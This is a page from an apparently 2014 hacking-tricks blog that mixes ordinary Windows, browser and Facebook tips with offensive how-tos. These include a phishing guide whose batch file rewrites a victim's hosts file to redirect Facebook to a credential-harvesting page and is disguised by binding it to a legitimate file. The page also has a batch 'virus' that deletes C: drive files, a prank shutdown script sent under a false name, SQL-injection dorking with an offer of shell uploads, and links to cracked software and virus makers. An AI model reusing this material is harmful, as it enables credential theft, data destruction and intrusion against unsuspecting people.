Saturday, 19 April 2014

See your friends IP

Go to the command prompt application. If you don’t understand just follow this step (windows XP):
Start >> Run >> cmd >> Enter
Or
Start >> Programs >> Accessories >> Command Prompt

You will see a windows command prompt appear. Then write a command
 “netstat –n” or netstat –a”
 and press enter. Please note that the symbol “ not included when you type that command. You will see information under Active Connections list of Proto, Local Address, Foreign Address and State.

Active Connections indicate the connections being connected to your computer. Proto show the protocol you use to. Local Address refers to Internet Protocol in you LAN connection. Foreign Address indicates the Internet Protocol connection that connect to you and the port they used.

Now you just to seek a remote port that used by foreign address. Usually remote port 80 or 81 is used to transfer a file. Remote Port 5050 used for private message. And 5100 used for web cam. And Remote Port 5000 or 5001 used for voice chat.
The IP address of PM not the real IP of your friend. It belongs to yahoo server IP. But if you send a file or receive a web cam you will be get a real IP of your friend address because yahoo use Peer to Peer connection to service this utility.

sharp ip getter

If you want a better way to get Internet Protocol of your friend, there are many software that designed and developed to get IP address. One of this software I ever tested and worked is Sharp IP Getter. We do not need to send a file or get a web cam to know the Internet Protocol of your friend. We only need have Private Message.

If you want to know about sharp ip and to download it click on Sharp ip getter 
Actually there is a simple steps using command prompt windows to find ip address from chat in yahoo messenger, but this is not the good time I give you that such ways, to get ip of Y!M, because without that steps, with Sharp IP Getter you already knew how to look for the IP address of a user or people in yahoo messenger.

How to use Sharp IP Getter:

Just run the software and instantly you will see a list of IP address in the software. That IP address should be the one / people who chat with you. If you are unable to see the IP, make sure you send a file or image aka photo to the target and the IP address of the target will rise at Sharp IP Getter.



Read More
No comments:

Desktop Phishing

Procedure:-

1. First Download and install xammp on your PC, Start Apache and Msql services

2. Download the Facebook Phisher page From the link given above, Place all its contents in the
ht docs folder which should be under Xammp (place were you installed xampp)

3. Install ProXPN VPN or any other static VPN, i recommend you to use Strong Vpn as it very
stable and gives you a static IP Once you install and run it, you will get a static IP (vpn)

4. Now we have to replace some text in the victims Host file which is
at C:\windows\system32\drivers\etc ,You can do this by many ways either by using a SFX
archive or using a batch file for this tutorial we will use a batch file to accomplish the job
@echo off
echo 172.X.XX.X.X www.facebook.com >> C:\windows\system32\drivers\etc\hosts
exit
Replace "172.X.XX.X.X" with your IP (vpn ) address, Finally save it as Save it as
Something.bat

5. Now to avoid suspicion you can Bind the batch file with a legitimate file, Kindly use Flaming Binder or Grudge Binder to bind files

6. Now send the file via email or upload the file to a site and ask the victim to download the file
, After the victim downloads and clicks the file, his host file will be replaced ,So now when ever
the victim enters facebook.com He/She will be redirected to our Phisher Page, But the URL will
remain as Facebook.com

To see all the victims credentials and Password open newly created log.txt file which is under ht
docs folder

Read More
No comments:

Sunday, 13 April 2014

SQL Injection

HI frnds, 
 
Today I will tell You the useful Commands for Sql


Injection(SQL injection used to hack A wesite)

ABORT -- abort the current transaction
ALTER DATABASE -- change a database

ALTER GROUP -- add users to a group or remove users from a group

ALTER TABLE -- change the definition of a table

ALTER TRIGGER -- change the definition of a trigger

ALTER USER -- change a database user account

ANALYZE -- collect statistics about a database

BEGIN -- start a transaction block

CHECKPOINT -- force a transaction log checkpoint

CLOSE -- close a cursor

CLUSTER -- cluster a table according to an index

COMMENT -- define or change the comment of an object

COMMIT -- commit the current transaction

COPY -- copy data between files and tables

CREATE AGGREGATE -- define a new aggregate function

CREATE CAST -- define a user-defined cast

CREATE CONSTRAINT TRIGGER -- define a new constraint trigger

CREATE CONVERSION -- define a user-defined conversion

CREATE DATABASE -- create a new database

CREATE DOMAIN -- define a new domain

CREATE FUNCTION -- define a new function

CREATE GROUP -- define a new user group

CREATE INDEX -- define a new index

CREATE LANGUAGE -- define a new procedural language

CREATE OPERATOR -- define a new operator

CREATE OPERATOR CLASS -- define a new operator class for indexes

CREATE RULE -- define a new rewrite rule

CREATE SCHEMA -- define a new schema

CREATE SEQUENCE -- define a new sequence generator

CREATE TABLE -- define a new table

CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger

CREATE TYPE -- define a new data type

CREATE USER -- define a new database user account

CREATE VIEW -- define a new view

DEALLOCATE -- remove a prepared query

DECLARE -- define a cursor

DELETE -- delete rows of a table

DROP AGGREGATE -- remove a user-defined aggregate function

DROP CAST -- remove a user-defined cast

DROP CONVERSION -- remove a user-defined conversion

DROP DATABASE -- remove a database

DROP DOMAIN -- remove a user-defined domain

DROP FUNCTION -- remove a user-defined function

DROP GROUP -- remove a user group

Read More
No comments:

Remove Gphone Virus



Well gphone.exe is one of the most dangerous virus spreading very rapidly. It is a Trojan and changes your IE homepage and sends tries to open gtalk and yahoo messenger. It even sends messages to gtalk contacts. Its icon is just like that of folder icon and people thinking of folder click on it get infected by the virus. Gphone virus basically is a 260 kb .exe file which looks like a folder and it can take any name of any other folder if you have clicked on the virus folder which looks like a folder but it is not. If you have a folder name ―movies‖ in your D drive it will make a exe file in the folder named movies.exe and if you click on that exe file it too work as a virus. It makes .exe files in all the folders you have with the name of the folder.
How to remove this virus Method 
method1-
1. Go to Task Manager then Processes and then click on gphone.exe and click on end process.
2. Manually go to folder where gphone.exe is present and delete it.

method 2-
Use the Glary Utilities freeware to remove the exe files.
1. Install the Glary Utilities.
Open it 2. Go to the modules tab -> Files and Folders-> Duplicate files finder. 3. Search for .exe files of same size and delete all the files with size 260 kb

Read More
No comments:

Hack To Set wallpaper In Pen Drive

Are you bored of viewing the same white background in your USB pen drive, here is a trick where you can easily set colorful wallpapers on your USB background.


For that you need the following code:-

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
IconArea_Image=yourpic.bmp
IconArea_Text=0×00000000

1.Copy and paste it in a notepad file.
2.specify the image file name (here it is yourpic.bmp)
3.save it in your memory stick or pendrive as desktop.ini also you are supposed to keep the image file on the memory stick or your pendrive.

Refresh and view the background. Now every time when you open your pendrive it will show background wallpaper.
“I suggest to hide desktop.ini after creation this will help to you hide your code so that no one can see how this was done.

SOURCE:- Hacking crux by "Hammad Kiyani"

Read More
No comments:

Security Kiss (Proxy Software)

Its available on all platforms like mac windows linux android,ios

SecurityKISS  is the program and the service that allows you access to the Internet despite censorship and local restrictions. It also makes your connection secure and prevents others from viewing your web browsing activities, instant messages, downloads, credit card information or anything else you send over the network.
Technically SecurityKISS is a Virtual Private Network (VPN) implementation. It creates a VPN between your computer and our security gateway so that all your internet traffic travels through an impenetrable, non-transparent tunnel.
For download Click here


Read More
No comments:

Proxifier (Proxy Software)

  • Proxifier allows network applications that do not support working through proxy servers to operate through a SOCKS or HTTPS proxy and chains
    Work with any Internet client through a proxy.
  • It Can Do :
  • Improve network performance or ensure privacy.
  • Flexible rule system.
  • Easy yet powerful UI with live data.
  • Up to date with new technologies.
  • Its available in mac nd windows
For download Click Here

Read More
No comments:

Create FB Virus (Funny)



As we all know creating virus is illegal but creating funny virus is not.
Here I will show you how to make a funny virus to panic your friends. In this tutorial I will show you how to make Facebook virus using simple commands on notepad. .This will make the victim think they have got a virus when they click on an icon such as Internet Explorer.

so, follows the steps:-
1) Open notepad 
2) Type this in : @echo off msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX! PAUSE shutdown -r -t 300 -c ―SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED!!! PLEASE WAIT ..........."
 3)Save as facebook password breaker .bat
4) Here the Virus is created and ready to use 
5) Send it to your friends and say them it can break Facebook accounts
 When He/She double click it a message will open and their computer will restart. After five minutes windows will restart, that is all. This is totally harmless and will give you a laugh.

NOTE: - The hack can be changed and use to make orkut virus or hi5.

Read More
No comments:

AVG ANTIVIRUS

AVG ANTIVIRUS 2014 Full Crack Free Download
                                                
For Download Click Here

Read More
1 comment:

Send Fake Emails For Free

So let's start how to Do it.

first of all the following Are some websites which helps to send fake emails
www.fakemailer.net
www.fakesend.com
www.deadfake.com   (good choice)
www.anonymailer.net    (best choice)

I tested on www.anonymailer.net so heres the trutial

www.tricksdevelopers.blogspot.com

Read More
No comments:

Remove Recycle Bin From Windows

HEy frnds today I will tell you how to remove recycle bin from computer
for this just the steps carefully

1.Open Regedit by going to START - RUN
2. type Regedit and hit enter.
3.Then you should navigate to following entry in registry 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E} 

4.delete it. 

This action should remove recycle bin from your computer

note:-reverse not possible

www.tricksdevelopers.blogspot.com

Read More
No comments:

The most simplest virus to crash computer


Virus to crash the window

IMP. Note>> I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept .

So lets start 
1.Open noepad nd Paste the given  code
@Echo off
Del C:\ *.* |y


2.Save It in .bat extension

Read More
No comments:

JonDo (Anonymous surfing)

Hey frnds, Today I will tell you about JonDos ,It is similar to tor browser

JonDos publishes a new version of the JonDo-Software, an IP changer and IP anonymization program, that you can use for anonymous surfing in the Internet with high security anonymous proxy servers.

What is JonDo? 
JonDo is an open source and free-of-charge program for Windows, Linux and MacOS X.
It hides the user's IP adress behind an anonymous IP address. In contrast to other anonymizers (VPNs, anonymous proxy servers), the user's anonymity stays protected even against the providers (operators) of the anonymous IP address.
Download (official Download)

Mirror Download

Read More
No comments:

How to find vulnerable websites (For beginners)

Step 1 -First you will need to click the "Scanner" tab and then the little "+" icon on the "All dorks". Once done you will see a list like below.
Step 2 - Next you will need to pick a specific "dork" I'm going to be using ASP with dork ; ".asp?bookID=" you can (enter it into the search box the type of dork you're looking for. This tutorial doesn't require this specific dork, you can chose one to your own preference. So now our stage process should be as shown below.
 
Step 3 - Now you will need to press the scan button, make sure to press "Remove duplicates".
Step 4 - Once you've completed "Step 3" the next thing you will need to do is right click your list (the white part) and press "Send to SQLI Crawler" as so.
Step 5 - Once in the SQLI Crawler you will need to press "Crawl" this will find you the vulnerable links from the ones you just just imported, this didn't work for me as good as I was hoping. It should look like the following.


step6 - Once your list is populated you have now got yourself some vulnerable sites to SQL inject.

 
I would of continued the tutorial into more depth of executing SQL injection with this tool but there's already tutorials around that you can use. If you need any help with SQL injecting/uploading a shell just PM me, I'll be more than happy to help. I know you might think this tutorial is well pointless but it's a simple way of finding vulnerable websites whilst using some of the best dorks. Oh and before you guys say isn't it better just using "Google" well in my opinion no, this method tells you if its vulnerable and gives you over +50 sites at a time which will keep you busy.

I hope you liked this tutorial and remember whenever hacking/exploiting sites always use a proxy to hide yourself, here's a few proxy's that I use.
http://www.hidemyass.com
http://www.newipnow.com
http://www.xitenow.com/ (best in my opinion)

Download (Survey free); http://www.mediafire.com/?dtnolcj562ca6ss

www.tricksdevelopers.blogspot.com

   

Read More
No comments:

Virus Maker Software

Dead Line Virus Maker
                   HEy frnds make your own virus with Deadlin virus maker

Make your own viruses to bring your target system down.
 It is available in two types, one is setup version and the other is portable version. you can      
                                                    download from the links given below.


www.tricksdevelopers.blogspot.com

Read More
No comments:

IDM Fully Registered

                                     

Hey friends you all know how much Idm important so here is the full cracked version,


Internet Download Manager 
6.18 Build 11 Registered
Size: 4 MB 
It is already Registered.


For Download Click HEre
 
By Hammad Kiyani

Read More
No comments:

Hacking Ebook

New Ebook Coming Soon : Author "Hammad Kiyani" 

That book covers many new topics like:

1. Basic Hacking

2. email-Hacking

3. Google Hacking

4. Websites and databases Hacking

5. Windows Passwords Cracking in seconds

6. Backtrack

7. Metasploit

8. Wireless Cracking

9. Mobile Hacking

Read More
No comments:

Hacking Crux 2 By Hammad Kiyani

"This book brings together certain essential aspects of ""ethical"" hacking: website attacks, SQL injection, proxy servers, spamming techniques, email hacking and many more. The subject matter at hand is broad-spectrum in essence, as it will lay a lucid foundation for those who are new to this field and will certainly prove to be a springboard for the amateurs. Those who cannot associate themselves with the field of hacking, believing it is for those with technical inquisitiveness or malicious intent, should consider the fact that in this cyber epoch where virtually everything has been budged online, no one is immune from the threat of hacking. With Internet being available on your phones, the rising utilization of wireless networks and e-transactions.....the sources of demolition continue to grow. And isn't being aware of the looming threats the most crucial prerequisite for safety? Apart from this, issues like forgetting the administrator password, Trojan attacks, recording a suspicious computer activity, accessing public networks, identifying system vulnerabilities can be tackled using hacking concepts.  A wide range of softwares and techniques that are quintessential for security of business organizations and educational institutions have been covered in this book. You definitely need not have a profound knowledge of programming languages or operating systems. Everything has been explained from the scratch for an ordinary computer user and scores of avenues for exploration have been provided for the tech-savvy users. So if you own a internet based device and do not want your operations to be exploited.....this book is definitely for you.  


About the Author :

"Hammad Kiyani"  is  a  sovereign  computer  security  consultant  and  has state-of-the-art  familiarity  in the  field of computers.  He is, however, especially recognized for his ethical hacking training sessions all around the world. Recently Tyagi conversed with several media channels to create consciousness in people regarding the threats and terror of hacking.  He has conducted a number of seminars on hacking in an array of colleges and universities. He was also invited as a speaker in the principal ethical hacking conference DEF CON, Chennai where he presented his research paper amongst other security experts. His research paper has also been published globally on exploit-db and packetstormsecurity, which are world renowned research paper database communities. Rahul Tyagi is presently working as the brand ambassador of TCIL-IT Chandigarh as Corporate Ethical Hacking Trainer. He also provides his services to ‘Cyber Security & Anti hacking Organization of India’ as Vice-President. Additionally, he is the Technical Head of News Paper Association of India as well.

Want to download ebook ! CLICK HERE

Read More
No comments:

Trace your profile visitors FB

Step 1) Go to your Facebook Profile Page.

Step 2) Now Press Ctrl + U from your keyboard for see source code of your profile page.
Step 3) Now press Ctrl + F from your keyboard to open search box.
Step 4) Now search this code {"list":


Step 5) You find some Facebook Profile Ids are like shown below. Click on example image for zoom.
Step 6) There are some Facebook Profile Ids of your friends who visited recently.
Step 7) The first one ID's are showing visits the most number of time. 
Step 8) Now if your want to findout, Open a new tab Enter below link :www.facebook.com/Facebook Profile Id
(don"t include number which are after -
100001257992988 -3 this is written copy upto 88 dont comp"-3" and write link like this www.facebook.com/100001257992988)
www.tricksdevelopers.blogspot.com

Read More
No comments:

Saturday, 12 April 2014

Teen Patti - Indian Poker Hack !!

Hack Info:
  • Works on ALL version game!
  • Works on Android phones and tablets, and on iOS Devices including iPhone, iPad, iPad Mini, and iPod Touch.
  • Tested by many people. And a lot of creators of hacks.
  • 100% SAFE.
  • Easy to use! Just click and wait few seconds.

Read More
No comments:

Friday, 11 April 2014

Speed Up Internet Connection By 20%..

Step:-1) Click On Start And Then Click On RUN Button And Type gpedit.msc And Press OK.. This Opens The Group Policy Editor.
Step:-2) Then Go To,
--> Local Computer Policy
--> Computer Configuration
--> Administrative Templates
--> Network
--> QOS Packet Scheduler
--> Limit Reservable Bandwidth.
Step:-3) Then Double Click On Limit Reservable bandwidth..
(It will say it is not configured, but the truth is under the 'Explain' tab i.e.by default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default.)
Step:-4) Above All The Process Enables The reservable bandwidth, Then Set This To ZERO..
(This will allow the system to reserve nothing, rather than the default 20%.)

Hurray.. Now Your Internet Speed Increase Upto 20%.
Enjoy.. And Please Share With Your Friends..
If You Having Any Problem, Dont Forget To Comment Below..
www.tricksdevelopers.blogspot.com

Read More
No comments:

Thursday, 10 April 2014

Voice Messages on Facebook Using MyMic Application...

The application is called MyMic and you’ll have to allow it access to your Facebook profile to make use of all it’s features. Just visit the application page and start using MyMic to send short voice messages or update your status. There is however a time limit for use of this service. You’ll only be able to record a message or status that is about 20 seconds long for free, but you can record a minute long message by paying for the service.


This application is child’s play, and very use to use. All you need is a microphone and something to speak into it!! Once your message is recorded, the application will ask you if you want to send it to a friend or just put it up as your status. Once you choose that you’ll be asked whether you’d like to post this new application on your wall and promote it, also you can customize settings such as who can see your Voice update.

Try it out, it’s a fun little app. And your friends don’t have to install anything to listen to your Voice message. It’s that simple.
www.tricksdevelopers.blogspot.com

Read More
No comments:

Wednesday, 9 April 2014

Free FB From Mobile

Not a problem. You can still use your Facebook account by dialing *325#  from your mobile phone – this service requires no data plan or Internet and it will even work on all phones.

Read More
No comments:

How To Read PDF On Nokia S40 Mobiles:-

Step:-1) First you have to download and install S40 reader from here. 
Step:-2) Now open downloaded app.
Step:-3) Now you can browse any PDF file from your mobile.

Read More
No comments:

Reset Password Of Samsung Mobile In Just 1 Minuite

Step:-1) Type *2767*3855# From Your Samsung Mobile.
Step:-2) And Then Press On Call Button.
Step:-3) After That Your Password Will Reset To Your Default Security Code.

Read More
No comments:

Enjoy Ufone Free Internet

#‎Ufone‬ Free Net
Again working On Java
Name: Ufone Net
Apn: wap.ufone.com/lowbalance
Proxy: 20.05.195.109
Port: 8080

Uc Handler 8.9 Setting
Name: Ufone Net
ProxyType: Http
ProxyServer: wap.ufone.com/lowbalance
Enjoy fast & free

Read More
No comments:

How To Hide Files And Folders Using Command Prompt

Just Follow Below Simple Steps To Hide Files:

Step:-1) Press Windows Key + R Then Run Command Box Will Appear. 
Step:-2) Now Type 'cmd' And Hit Enter. 
Step:-3) Then Command Prompt Window Will Display.
Suppose We Have To Hide Folder 'xyz' And Its Path Is, "D:\xyz"
Step:-4) Then Type, "attrib+s +h D:\xyz" And Hit Enter. (D:\xyz is a demo folder name) . 
Step:-5) Now Your Folder Successfully Hide.
NOTE:- To view this folder again, follow the same procedure just replace '+' into '-' in command which given in Step:-4). 
Ex. attrib-s -h D:\xyz.


Read More
No comments:

How To Improve Internet Speed

Its very easy to improve speed of your firefox, There is one very super firefox extension called "Fasterfox Lite"

Fasterfox Lite comes with pre-configured tweaks to improve the browsing speed of Firefox when using most broadband internet connections. 
Fasterfox Lite will speed up your web browsing right out of the box with no assembly required. People who complain that Firefox is slow obviously do not have Fasterfox Lite installed. (Actual speed improvements may vary depending on the desired settings that are used and the presented testing situation.)After installing Fasterfox Lite, just select Turbo Charged In Options.
It gives maximum performance for giving very good speed in internet connectivity and other sections too..

Click Here To Download Fasterfox Lite Extension.


Enjoy Firefox In Very Lightning Speed Friends..

Read More
No comments:

Change the Address of the Page (FB)

When the Language is changed , you might see every texts on the screen in the chosen language. So next what you have to do is to change the address of your Facebook fan page.
To change the address click on the 5th option from the top under “Edit Info” page. It is noting but the address name changing option translated in the selected language.
If you have chosen Korean or Japanese or Chinese :
For the first box input the number “00000″.Input the text “Amman,Jordan” in the second box.
In the third box type in “Jordan” .
If you have chosen Arabic as the Language :
For the first box type in “Jordan“.
Input “Amman, Jordan” in the Second box .
In the third box type in “00000
And then save the address along with the map.
Finally Change back the Language to English(US) and you will see your page name changed with the text you have entered and with the symbol at the end.

Read More
No comments:

Set a Proxy using Google Chrome

I’d recommend to use the Japan proxy “112.175.251.56” because when connected with proxy your internet connection might become slower but the above proxy will be the fastest among all. To set a proxy in Chrome follow the steps as given .Open Google Chrome and click on the settings and search Proxy on the search bar (or) paste this on your chrome address bar “chrome://settings/search#proxy
Click on the “Change Proxy Settings” and from the Internet Popup that appears click on “LAN Settings“.

Click on “Use a proxy settings for LAN” and use this IP “112.175.251.56” & port “8080“.


Read More
No comments:

Tuesday, 8 April 2014

FB PHOTO VERIFICATION

Sometimes Facebook community block your id for some invalid activities then you got a option of Photo Verification to login your account. Its not easy to remember all photos information about your friends. So here is a latest Trick of 2014 to Verify Photos on Facebook. Just follow this Simple steps.

Step 1 - Go to Google images search

Step 2 - Type Facebook "name of 1st friend" copy and paste from blocked account


Step 3 - Search , you will see the picture of the 1st friend in the 1st 3 results

Step 4 - If you didn't identify the picture, repeat the same

Step 5 - If you didn't identify the friend.simply skip the picture and you will get another one (always you have 2 skips/picture)

Step 6 - After you identify the 5 pictures Facebook will ask you to change your password and email password

Step 7 - Change your Facebook account password and confirm that you change your email password (even you don't)

Step 8 - Now every thing is OK.!!

Read More
No comments:

CC TO MANAGER

Following are the step how Content Creator Can Hack and Take Over the Page
First step: make a new page with the same name. For example, if the page is “Himalayan Blogger” and a content creator wants to hack the page then he have to make a new page with the same name i.e. “Himalayan Blogger”.
Second step :content creator can visit fan page settings and merge the fan page into the new one having the same name so all the fans will be transferred to the new fan page and he will be the manager of that page. Third step: Now content creator can remove you as the page manager of the actual page and can enjoy the manager role on your page.
This post “Facebook Fan page Bug “Content Creator Can Hack and Take Over the Page“ is just for awareness if you are a page owner/manager. It must be fixed soon asContent Creator Can Hack and Take Over the Pageant there is no such solution to get it back. Facebook can control this by removing the feature of “Merging pages”
 
YOU HAVE ANY PROBLEM TO COMMENT FAST I ANSWARE YOU :)

Read More
No comments:

Thursday, 3 April 2014

Open Link In New Tab

Open a link in a new browser Window or Tab by holding down the Shift key on the keyboard and clicking on the link. This works on all major browsers including Microsoft Internet Explorer and Mozilla Firefox.
Alternatively a user could right-click on the link and choose Open in New Window or if you have a mouse with a wheel click the link with wheel button.

Read More
No comments:

Shortcut Keys Of Popular Browsers

Quickly get to the address bar or Omnibox in your Internet browser by using any of the below shortcut keys. As can be seen in the below chart, Ctrl + L seems to be a universally used shortcut key to get into the address bar and is our recommended shortcut key to learn and use.
Browser F6 key F8 key Ctrl + L Alt + D
Google Chrome Yes No Yes Yes
Internet Explorer Yes No Yes Yes
Mozilla Firefox Yes No Yes Yes
Opera No Yes Yes Yes

Read More
No comments:

Increase the speed of Firefox


If you have a broadband Internet connection and use Firefox you can decrease the time each web page you visit loads by enabling pipelining. Pipelining will make Firefox load more than one request at a time for each page it loads. In other words if the page you are visiting has dozens of images it will load more than one image at a time, making the web page appear faster. Follow the below steps to enable pipelining in Firefox.
  1. In the address bar type about:config and press enter.
  2. In pipelining in the search box, as shown below.
  3. Double-click network.http.pipelining to set the Value to true.
  4. Double-click network.http.proxy.pipelining to set the Value to true.
  5. Make sure network.http.pipelining.maxrequests is set to a value of more than 30.
  6. Right-click in an empty portion of the about:config window and click New and then Integer. Enter nglayout.initialpaint.delay as the name of the integer and for the value make it 0.
Firefox about:config pipelining 

Read More
No comments:

View non-public profile photos in full size FB

With this trick, you will be able to view any profile picture as full-sized, regardless of whether or not it’s marked as private.
Attention stalkers: Please disregard everything you’re about to read.
How to do it
1. Go to the profile picture you’d like to see and open it in a new tab or window (on Mac, Ctrl-Click and then ‘Open Image in New Tab’, on PC, right click and then ‘Open Image in New Tab’).
2. Go to new tab or window, to the address bar. You should see a portion of the url that looks something like this:
pic 1 637x15 6 (More) Interesting Facebook Tricks You Might Not Know
3. Remove the ‘s160x160’, and hit enter.
Voila! You should see the full sized image in your browser. Note that if the original picture was small, this trick won’t do you much good!

Read More
No comments:

Disable Read Receipt FB

While Facebook doesn’t allow you to turn off read receipts, there are third party apps that allow you to set up this feature, allowing you to go undetected on Facebook messages or chats.
The Facebook Unseen add-on for Chrome ensures no one can see whether or not you’ve read their messages, giving you an added layer of privacy and flexibility.
How to do it
1)      Download Facebook Unseen
2)      Once it’s installed, you should see the Facebook Unseen icon in your brower:
facebook unseen 6 (More) Interesting Facebook Tricks You Might Not Know
3)      Click on the icon to be sure it’s enabled. When it’s working, you should see the following message:
chat unseen enabled 6 (More) Interesting Facebook Tricks You Might Not Know

Read More
No comments:

Find out who’s un-friended you FB

I urge you only to use this one if you have a very solid self-esteem. While Facebook doesn’t give you a way to see who has un-friended you, there are third party apps that will tell you exactly who has ditched you.
The Trick
By using Who.deleted.me you can find out exactly who has un-friended you, and you will even receive ongoing notifications when anything changes in terms of your Facebook friendships.
How to do it
1. Go to Who.deleted.me and login using Facebook.

Read More
No comments:

Post Blank Status FB

Granted, I’m not sure why you’d want to do this. But should the need ever arise to post a completely blank update, you’ll know who to thank!
The Trick
Facebook doesn’t allow you to post a blank update, so if you attempt to publish a blank post, you’ll see this:
status empty 6 (More) Interesting Facebook Tricks You Might Not Know
Of course, you could just type in a period or underscore and have an almost blank post, but’s what’s the fun in that? If you’re going to go to the trouble of posting a blank update, you at least want your friends to wonder, ‘How did he do that?’
How to do it
To post a blank status update, simply type the following into your update box:
@[0:0: ]
And if you want to have several blank lines – you guessed it – just copy and paste the code onto multiple lines.
It appears that for some users, a question mark in a black diamond appears rather than a completely blank update. I’m not sure why this works differently for different users, but it may simply be a browser-related issue.

Read More
No comments:

Mute Conversation FB

An easy way to ‘opt out’ of ongoing conversations is to simply ‘mute’ them. This will continue to allow you access to the conversation, however you won’t receive notifications of new comments.
How to do it
  1. Go into the offending message, and click on the Actions tab at the top right corner of the screen.
  2. Click on Mute Conversation, and all notifications will cease.
mute 6 (More) Interesting Facebook Tricks You Might Not Know
If you’re part of a group conversation, you can also choose to leave the conversation, however this would mean you lose access to future replies. By muting the conversation, you can continue to read new replies at your leisure.

Read More
No comments:

Download an entire Facebook photo album

Your brother has just uploaded 500 adorable pictures of his new baby daughter, and you’d like to save them to your computer. How do you do it? One picture at a time! Currently, this is the only way Facebook gives us to download photos. The Trick
PhotoLive to the rescue! This handy little extension allows you to quickly and easily download entire photo albums from Facebook to your desktop.
How to do it
  1. Go to Photo Live and download the extension (please note, while it’s completely free, it does require registration including credit card information, although you will not be charged).
  2. Once it’s installed, you will see a button at the top of your Facebook page whenever you view a photo album. Clicking on it will download the album as a zip file to your computer.
It’s as simple as that!
photolive 637x317 6 (More) Interesting Facebook Tricks You Might Not Know
Image courtesy of Life Hack

Read More
No comments:

Blog Archive